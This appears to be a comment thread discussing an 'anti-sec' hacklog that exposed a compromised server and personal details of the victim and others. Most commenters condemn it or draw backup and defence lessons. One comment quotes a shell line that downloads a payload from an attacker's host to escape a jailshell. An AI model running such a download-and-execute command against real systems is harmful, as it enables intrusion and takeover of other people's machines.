>> // We at anti-sec, hope you never heal :]<p>I hope I'm not the only one who thinks that this is taking things too far. Compromising his server is one thing, compromising his health and delving into his personal life and exposing the details of others who have no relation to this little vendetta is another. Personally, I hope whoever is responsible gets caught.
Seems like people are discovering "hacklogs"; they're published in scene zines and are mostly harmful. The only reason to read them is for schadenfreude; it's usually one hacker taking out another, I don't think the misfortunes of civilians are logged.<p>For a glimpse into this, and for the most entertaining hacker interview ever conducted, I invite you all to read the phrack interview with The Unix Terrorist:<p><a href="http://phrack.org/issues.html?issue=65&id=2#article" rel="nofollow">http://phrack.org/issues.html?issue=65&id=2#article</a><p>A magnificent display of ego, knowledge and balls. A laugh out loud tale of human malice! A+.
"sh-3.1$ wget <a href="http://anti.sec.labs/MichaelScofield" rel="nofollow">http://anti.sec.labs/MichaelScofield</a><p>That, ladies and gentlemen, to escape from a jailshell is just plain funny.
Response on reddit:<p><a href="http://www.reddit.com/r/programming/comments/8r04o/pwned_part_2/c0a5vu5" rel="nofollow">http://www.reddit.com/r/programming/comments/8r04o/pwned_par...</a>
__According to__ nowayout, it is fake <a href="http://pastebin.com/m1ddc62d7" rel="nofollow">http://pastebin.com/m1ddc62d7</a> ,<p>bot nobody cares/agrees to him on #bhf<p>plus its a nice read indeed, as twitter.com/linuxing said "its like geek porn..."
While it sucks for the people involved, these posts just got me to go verify that all my sites have backups setup, and that the backups cannot be deleted via ftp
The good part - we get a view of what one does when on gets into your box, this is good enough to build defense/alert systems against such activities...